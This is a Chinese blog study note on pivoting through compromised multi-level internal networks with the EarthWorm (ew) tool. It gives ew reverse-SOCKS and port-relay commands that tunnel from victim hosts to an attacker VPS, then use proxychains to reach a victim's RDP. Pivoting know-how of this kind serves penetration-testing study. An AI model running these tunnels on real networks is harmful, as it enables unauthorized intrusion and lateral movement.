前言

之前用过nc、reGeorg、lcx涉及到的都是一级网络环境,今天看到圈子里发了文章学习记录下。

端口转发

主要记录下ew在多级网络环境下的使用。这里说下ew穿透成功后,win可以用http://www.sockscap64.com,linux用proxychains代理使用。

一级网络

普通连接就行了

正向代理

本地机器直接连接靶机(需要靶机有外网)

ew –s ssocksd –l 888
反向代理 (目标机器没有公网ip,但可访问内部资源)

vps

ew -s rcsocks -l 1008 -e 888

靶机

ew -s rssocks -d vps:ip -e 888

linux为例配置proxychains

vim /etc/proxychains.conf
socks5 [攻击者公网IP] 1008
proxychains rdesktop [受害者IP]:3389

二级网络(一)

假设我们有主机A与主机B的权限

B主机

ew -s ssocksd -l 888

A主机

ew -s lcx_tran -l 1080 -f 10.48.128.49 -g 888

该命令意思是将1080端口收到的代理请求转交给B主机(10.48.128.49)的888端口。

最后可以通过访问A主机外网139.XXX.XX.113:1080来使用在B主机架设的socks5代理。

二级网络(二)

假设我们获得了右侧A主机和B主机的控制权限,A主机没有公网IP,也无法访问内网资源。B主机可以访问内网资源,但无法访问外网。

VPS

ew –s lcx_listen –l 10800 –e 888

B主机

ew -s ssocksd -l 999

A主机

ew -s lcx_slave -d VPS:ip -e 888 -f 10.48.128.49 -g 999

将VPS公网的888端口与B主机内网的999端口连接

最后可以通过访问公网VPS地址 139.XXX.XX.113:10800来使用在B主机架设的socks5代理。

三级网络环境

右侧内网A主机没有公网IP但可以访问外网,B主机不能访问外网但可以被A主机访问、C主机可被B主机访问而且能够访问核心区域。

VPS

ew -s rcsocks -l 1080 -e 888

A主机

ew -s lcx_slave -d 139.XXX.XX.113 -e 888 -f 10.48.128.12 -g 999

B主机

ew -s lcx_listen -l 999 -e 777

C主机

ew -s rssocks -d 10.48.128.12 -e 777

在MY PC上可以通过访问公网VPS 139.XXX.XX.113:1080来使用在C主机架设的socks5代理。

整个数据流向是:SOCKS V5 → 1080 → 888 →999 →777 → rssocks

直接照搬过来的,理解了其实也不难,就是转来转去中间再搭个桥,主要是能灵活运用。

参考连接:

https://www.anquanke.com/post/id/85494